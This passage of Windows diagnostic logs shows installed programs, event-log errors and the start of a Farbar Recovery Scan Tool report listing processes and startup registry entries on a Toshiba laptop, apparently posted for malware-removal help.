"{26A24AE4-039D-4CA4-87B4-2F83216025FF}" = Java 6 Update 25

"{26CE484D-2E8E-40D5-B251-158133114C69}" = TomTom HOME

"{28DB8373-C1BB-444F-A427-A55585A12ED7}" = Motorola Device Manager

"{2902F983-B4C1-44BA-B85D-5C6D52E2C441}" = Windows Live Mesh ActiveX Control for Remote Connections

"{2A3FC24C-6EC0-4519-A52B-FDA4EA9B2D24}" = Windows Live Messenger

"{2A4EEB5C-3BA6-4299-A87F-783861B567D9}" = TurboTax 2013 WinPerReleaseEngine

"{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App" = Update Installer for WildTangent Games App

"{305706E3-A7FC-466F-8594-AD4522951418}" = Jewel Quest Mysteries Trail of the Midnight Heart

"{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}" = Amazon Links

"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery

"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery

"{358C44FD-6943-4CDD-B947-7F7C4ADC8A8F}" = TurboTax 2013 WinPerTaxSupport

"{3782EC09-4000-475E-8A59-9CABD6F03B4C}" = TurboTax 2010 WinPerFedFormset

"{378397D6-FD32-4092-A854-6A75CB7EDA46}" = MOTOROLA MEDIA LINK

"{3881DB80-EAA2-012B-ADAE-000000000000}" = TurboTax 2009 WinPerFedFormset

"{38975F50-EAA2-012B-ADB4-000000000000}" = TurboTax 2009 WinPerReleaseEngine

"{38A34630-EAA2-012B-ADB6-000000000000}" = TurboTax 2009 WinPerTaxSupport

"{3A2EEF40-EAA2-012B-AE15-000000000000}" = TurboTax 2009 wmoiper

"{3BF564F2-7434-454A-88DD-9A6114851751}" = National Geographic Collector's Pack

"{3C5A81D0-EAA2-012B-AE9F-000000000000}" = TurboTax 2009 wrapper

"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel® Rapid Storage Technology

"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater

"{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}" = Google Earth Plug-in

"{4F2FCCCF-29F3-44B9-886F-6D16F8417522}" = TurboTax 2010 wrapper

"{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}" = TOSHIBA Supervisor Password

"{5279374D-87FE-4879-9385-F17278EBB9D3}" = TOSHIBA Hardware Setup

"{5401CEE8-3C2D-4835-A802-213306537FF4}" = MotoCast

"{5442DAB8-7177-49E1-8B22-09A049EA5996}" = Renesas Electronics USB 3.0 Host Controller Driver

"{579684A4-DDD5-4CA3-9EA8-7BE7D9593DB4}" = Windows Live UX Platform Language Pack

"{5AF550B4-BB67-4E7E-82F1-2C4300279050}" = TOSHIBARegistration

"{606EB5EB-AADF-4E21-B715-1CAD291181D6}" = TurboTax 2013 wrapper

"{617773AE-ADBA-4479-BB04-65FE7758B35C}" = TOSHIBA Wireless Display Monitor

"{620BBA5E-F848-4D56-8BDA-584E44584C5E}" = TOSHIBA Flash Cards Support Utility

"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel® Management Engine Components

"{654F7484-88C5-46DC-AB32-C66BCB0E2102}" = TOSHIBA Sleep Utility

"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE

"{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}" = TOSHIBA Resolution+ Plug-in for Windows Media Player

"{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}" = TOSHIBA Web Camera Application

"{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-toshiba" = WildTangent Games App (Toshiba Games)

"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable

"{71AA2137-C3F3-45C6-A408-81697FE5A3B8}" = PCmover Professional

"{7257132D-7F65-41E6-A90F-43BF6099461A}" = Intel® WiDi

"{7748A531-DACF-4B0A-B927-804EBC2CB5FE}" = TurboTax 2011 wmoiper

"{78002155-F025-4070-85B3-7C0453561701}" = Apple Application Support

"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update

"{7E4CB404-F1E4-4E81-A1CB-2CBB310481D1}" = MLE

"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable

"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform

"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver

"{894AB83D-A9AF-4E54-BFF3-A7262A0A6C13}" = Motorola Device Software Update

"{89EC099E-958D-462E-972C-385591946978}" = TurboTax 2012 WinPerFedFormset

"{8C6D6116-B724-4810-8F2D-D047E6B7D68E}" = Mesh Runtime

"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT

"{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}" = TomTom HOME Visual Studio Merge Modules

"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010

"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010

"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010

"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010

"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010

"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010

"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010

"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010

"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010

"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010

"{90140000-003D-0000-0000-0000000FF1CE}" = Microsoft Office Single Image 2010

"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010

"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010

"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010

"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010

"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker

"{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}" = TOSHIBA Application Installer

"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17

"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail

"{9E565949-F5CD-40F1-B4F7-06FDA99EA132}" = TurboTax 2013 wmoiper

"{A0C91188-C88F-4E86-93E6-CD7C9A266649}" = Windows Live Mesh

"{A525E00B-6609-442E-9DCD-64453C233E8D}" = TurboTax 2010 WinPerReleaseEngine

"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer

"{A8B1F076-965D-4663-A9D4-C2FB58A42AE4}" = TurboTax 2012 WinPerTaxSupport

"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper

"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common

"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer

"{AAF454FC-82CA-4F29-AB31-6A109485E76E}" = Windows Live Writer

"{AC6569FA-6919-442A-8552-073BE69E247A}" = TOSHIBA Service Station

"{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" = Adobe Reader X (10.1.12) MUI

"{AFF7E080-1974-45BF-9310-10DE1A1F5ED0}" = Adobe AIR

"{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}" = TOSHIBA Recovery Media Creator

"{BD40253B-EFE2-4610-9AA5-F3317DB970BE}" = Jewel Quest Mysteries The Seventh Gate

"{C2A276E3-154E-44DC-AAF1-FFDD7FD30E35}" = TOSHIBA Assist

"{C31337DE-0CDC-45A9-9A32-F099AC78D557}" = Toshiba Book Place

"{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}" = Toshiba Online Backup

"{C66824E4-CBB3-4851-BB3F-E8CFD6350923}" = Windows Live Mail

"{C7A4F26F-F9B0-41B2-8659-99181108CDE3}" = TOSHIBA Media Controller

"{CAF5B770-082F-40C4-853D-3973BB81BDAA}" = TurboTax 2011 WinPerTaxSupport

"{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}" = PlayReady PC Runtime x86

"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform

"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64

"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common

"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform

"{DA84ECBF-4B79-47F2-B34C-95C38484C058}" = Skype Launcher

"{DA909E62-3B45-4BA1-8B58-FCAEBA4BCEC9}" = NVIDIA PhysX

"{DDC8BDEE-DCAC-404D-8257-3E8D4B782467}" = Windows Live Writer Resources

"{DECDCB7C-58CC-4865-91AF-627F9798FE48}" = Windows Live Mesh

"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10

"{E1754ED2-CD39-4F5F-AC98-0271EAE1C116}" = Setup

"{E185BD5C-0E10-479F-AF44-63D3A068446A}" = ICA

"{E24A5C1E-8647-43FD-838B-DF7149D492E4}" = DeviceIO

"{E2C2F547-4C5B-45F9-8445-C59E223CCB08}" = ContentHD

"{E3C1C994-CA69-4B3C-A290-C311617DE271}" = Contents

"{E463E171-4082-4744-A466-F7CBE8502789}" = TurboTax 2011 WinPerReleaseEngine

"{E5636C06-A318-4CF3-803B-5BD9F5C10822}" = PureHD

"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger

"{E5D50A9A-B973-46DE-89E4-8BDDD8A9F988}" = Share

"{E69992ED-A7F6-406C-9280-1C156417BC49}" = TOSHIBA Quality Application

"{E6ABA0E9-65E7-4366-9770-514ED4341611}" = VIO

"{E7EFA8C8-4CDE-4466-8E0E-01C04589ED90}" = ISCOM

"{E83F5F27-43F3-4163-ABE5-F68C989286ED}" = TurboTax 2012 wrapper

"{EA6625D5-E563-4FE3-8D98-B3F5B64CBC67}" = IPM_OEM

"{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}" = Toshiba App Place

"{EDD9E0C4-B402-40DF-B33D-405CA1E23BA6}" = DFPro

"{EE556A3E-EB37-4392-9637-BAA8EC2F47FA}" = TurboTax 2011 wrapper

"{F014B696-28C5-4554-802F-A15380418F53}" = TurboTax 2012 WinPerReleaseEngine

"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]

"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel® Processor Graphics

"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver

"{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}" = TOSHIBA Media Controller Plug-in

"{FAD3D68B-2F9C-459B-AA79-C04B9090FD72}" = TurboTax 2011 WinPerFedFormset

"{FBA641F3-7A87-4179-8E4E-F77D25BC1067}" = TurboTax 2012 wmoiper

"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials

"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

"Adobe AIR" = Adobe AIR

"Adobe Flash Player ActiveX" = Adobe Flash Player 15 ActiveX

"Adobe Flash Player Plugin" = Adobe Flash Player 15 Plugin

"Amazing Adventures The Forgotten Dynasty" = Amazing Adventures The Forgotten Dynasty

"Amazon MP3 Downloader" = Amazon MP3 Downloader 1.0.17

"Big City Adventure San Francisco_is1" = Big City Adventure San Francisco

"Big City Adventure Sydney_is1" = Big City Adventure Sydney

"Castle - Never Judge a Book by Its Cover" = Castle - Never Judge a Book by Its Cover

"Escape The Emerald Star" = Escape The Emerald Star

"Escape Whisper Valley" = Escape Whisper Valley

"Google Chrome" = Google Chrome

"Hoyle Card Games Classic" = Hoyle Card Games Classic

"Hoyle Casino Classic" = Hoyle Casino Classic

"InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package

"InstallShield_{12688FD7-CB92-4A5B-BEE4-5C8E0574434F}" = Utility Common Driver

"InstallShield_{1C8C049A-145F-4A6E-8290-B5C245EBE39D}" = TOSHIBA Bulletin Board

"InstallShield_{24811C12-F4A9-4D0F-8494-A7B8FE46123C}" = TOSHIBA ReelTime

"InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}" = TOSHIBA Supervisor Password

"InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}" = TOSHIBA Hardware Setup

"InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}" = Renesas Electronics USB 3.0 Host Controller Driver

"InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}" = TOSHIBA Flash Cards Support Utility

"InstallShield_{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}" = TOSHIBA Web Camera Application

"InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}" = TOSHIBA Face Recognition

"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware version 2.0.3.1025

"Mystery P.I. - Stolen in San Francisco" = Mystery P.I. - Stolen in San Francisco

"Mystery P.I. - The New York Fortune" = Mystery P.I. - The New York Fortune

"N360" = Norton 360

"Norton PC Checkup_is1" = Norton PC Checkup

"NortonPCCheckup" = Toshiba Laptop Checkup

"NVIDIA StereoUSB Driver" = NVIDIA 3D Vision Controller Driver

"Office14.SingleImage" = Microsoft Office Professional 2010

"Samsung CLP-310 Series" = Samsung CLP-310 Series

"TurboTax 2009" = TurboTax 2009

"TurboTax 2010" = TurboTax 2010

"TurboTax 2011" = TurboTax 2011

"TurboTax 2012" = TurboTax 2012

"TurboTax 2013" = TurboTax 2013

"Vacation Quest - Australia" = Vacation Quest - Australia

"Vacation Quest - The Hawaiian Islands" = Vacation Quest - The Hawaiian Islands

"WildTangent toshiba Master Uninstall" = WildTangent Games

"WinLiveSuite" = Windows Live Essentials

"WTA-0c80c96a-47fe-4b60-9724-093f6a197352" = Tales of Lagoona

"WTA-15266c6a-1f91-4939-8397-a572d8609ef0" = FATE - The Traitor Soul

"WTA-35a2d0f9-7aa5-4ec1-a681-1e7f67317f9b" = Letters from Nowhere 2

"WTA-3d5c7790-1519-49e0-944a-524307e6f9f0" = Zuma's Revenge

"WTA-5cd3568b-66c2-4138-a92d-36394a12ae49" = Bejeweled 3

"WTA-5ee8d5c0-1a1b-4c99-87da-05a32548efa1" = RollerCoaster Tycoon 3: Platinum

"WTA-a98b9f0b-b8b2-4447-ab15-61d6b3a3b0f0" = Plants vs. Zombies - Game of the Year

"WTA-b6c271df-e1ef-4ec5-91dc-b8a276ccb8e5" = Penguins!

"WTA-fc1c5fea-b508-4d5e-8168-891f0007cf9d" = Polar Bowler

========== Last 20 Event Log Errors ==========

[ Application Events ]

Error - 7/6/2013 9:20:07 AM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

Error - 7/6/2013 1:06:41 PM | Computer Name = Heathman-PC | Source = VSS | ID = 8193

Description =

Error - 7/6/2013 4:07:52 PM | Computer Name = Heathman-PC | Source = Microsoft Security Client Setup | ID = 100

Description = HRESULT:0x8004FF0A Description:Microsoft Security Essentials installation

was canceled. You canceled the Security Essentials installation on your computer.

Error code:0x8004FF0A.

Error - 7/6/2013 4:15:39 PM | Computer Name = Heathman-PC | Source = VSS | ID = 8193

Description =

Error - 7/6/2013 4:25:23 PM | Computer Name = Heathman-PC | Source = WinMgmt | ID = 10

Description =

Error - 7/6/2013 4:28:31 PM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

Error - 7/6/2013 4:29:39 PM | Computer Name = Heathman-PC | Source = Application Error | ID = 1000

Description = Faulting application name: Kindle.exe, version: 1.10.4.40317, time

stamp: 0x505c6714 Faulting module name: Kindle.exe, version: 1.10.4.40317, time

stamp: 0x505c6714 Exception code: 0x40000015 Fault offset: 0x0029d874 Faulting process

id: 0x1490 Faulting application start time: 0x01ce7a8758320c8a Faulting application

path: C:\Users\Heathman\AppData\Local\Amazon\Kindle\application\Kindle.exe Faulting

module path: C:\Users\Heathman\AppData\Local\Amazon\Kindle\application\Kindle.exe

Report

Id: c7d96bee-e67a-11e2-b47e-dc0ea14cb7ed

Error - 7/7/2013 4:30:27 PM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

Error - 7/7/2013 6:28:48 PM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

Error - 7/7/2013 7:40:18 PM | Computer Name = Heathman-PC | Source = Toshiba App Place | ID = 0

Description =

[ System Events ]

Error - 10/28/2014 10:05:28 PM | Computer Name = Heathman-PC | Source = WMPNetworkSvc | ID = 866321

Description =

Error - 10/28/2014 10:05:28 PM | Computer Name = Heathman-PC | Source = WMPNetworkSvc | ID = 866317

Description =

Error - 10/28/2014 10:05:28 PM | Computer Name = Heathman-PC | Source = WMPNetworkSvc | ID = 866321

Description =

Error - 10/28/2014 10:05:28 PM | Computer Name = Heathman-PC | Source = WMPNetworkSvc | ID = 866317

Description =

Error - 10/28/2014 10:21:34 PM | Computer Name = Heathman-PC | Source = DCOM | ID = 10010

Description =

Error - 10/28/2014 10:21:40 PM | Computer Name = Heathman-PC | Source = DCOM | ID = 10010

Description =

Error - 10/28/2014 11:04:04 PM | Computer Name = Heathman-PC | Source = DCOM | ID = 10010

Description =

Error - 10/29/2014 8:15:16 AM | Computer Name = Heathman-PC | Source = Service Control Manager | ID = 7030

Description = The PEVSystemStart service is marked as an interactive service. However,

the system is configured to not allow interactive services. This service may not

function properly.

Error - 10/29/2014 8:19:08 AM | Computer Name = Heathman-PC | Source = Application Popup | ID = 1060

Description = \??\C:\ComboFix\catchme.sys has been blocked from loading due to incompatibility

with this system. Please contact your software vendor for a compatible version

of the driver.

Error - 10/29/2014 8:24:26 AM | Computer Name = Heathman-PC | Source = Service Control Manager | ID = 7030

Description = The PEVSystemStart service is marked as an interactive service. However,

the system is configured to not allow interactive services. This service may not

function properly.

< End of report >


Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 29-10-2014

Ran by ADH (administrator) on HEATHMAN-PC on 29-10-2014 09:20:40

Running from C:\Users\ADH.Heathman-PC\Desktop\FRST64

Loaded Profiles: UpdatusUser & ADH (Available profiles: Heathman & UpdatusUser & ADH)

Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)

Internet Explorer Version 10

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe

(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe

(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

(Symantec Corporation) C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe

(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe

(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe

(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe

(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe

(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe

(TomTom) C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe

() C:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe

(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe

(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

(Intel Corporation) C:\Windows\System32\igfxtray.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TBS\HSON.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe

(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe

(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe

(TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe

(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe

(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe

() C:\Windows\Samsung\PanelMgr\SSMMgr.exe

(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe

() C:\Windows\Samsung\PanelMgr\caller64.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe

(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe

(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe

(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe

(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [590256 2011-05-17] (TOSHIBA Corporation)

HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [296824 2010-09-25] (TOSHIBA Corporation)

HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11775592 2011-01-26] (Realtek Semiconductor)

HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2188904 2011-01-18] (Realtek Semiconductor)

HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-03] (Synaptics Incorporated)

HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon

HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1544624 2011-05-24] (TOSHIBA Corporation)

HKLM\...\Run: [intelPAN] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-06-01] (Intel® Corporation)

HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-09] (TOSHIBA Corporation)

HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [712096 2011-07-01] (TOSHIBA Corporation)

HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)

HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [597936 2011-07-27] (TOSHIBA Corporation)

HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)

HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [532480 2010-11-09] (TOSHIBA CORPORATION)

HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2011-03-10] (TOSHIBA Electronics, Inc.)

HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2010-08-16] (TOSHIBA CORPORATION)

HKLM-x32\...\Run: [ToshibaServiceStation] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1298816 2011-07-11] (TOSHIBA Corporation)

HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)

HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [samsung PanelMgr] => C:\windows\Samsung\PanelMgr\ssmmgr.exe [606208 2009-12-09] ()

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)

HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)

Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)

HKU\S-1-5-21-616022151-183045692-1389677156-1014\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-03-24] (Google Inc.)

AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [260416 2012-02-29] (NVIDIA Corporation)

AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-02-29] (NVIDIA Corporation)

ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

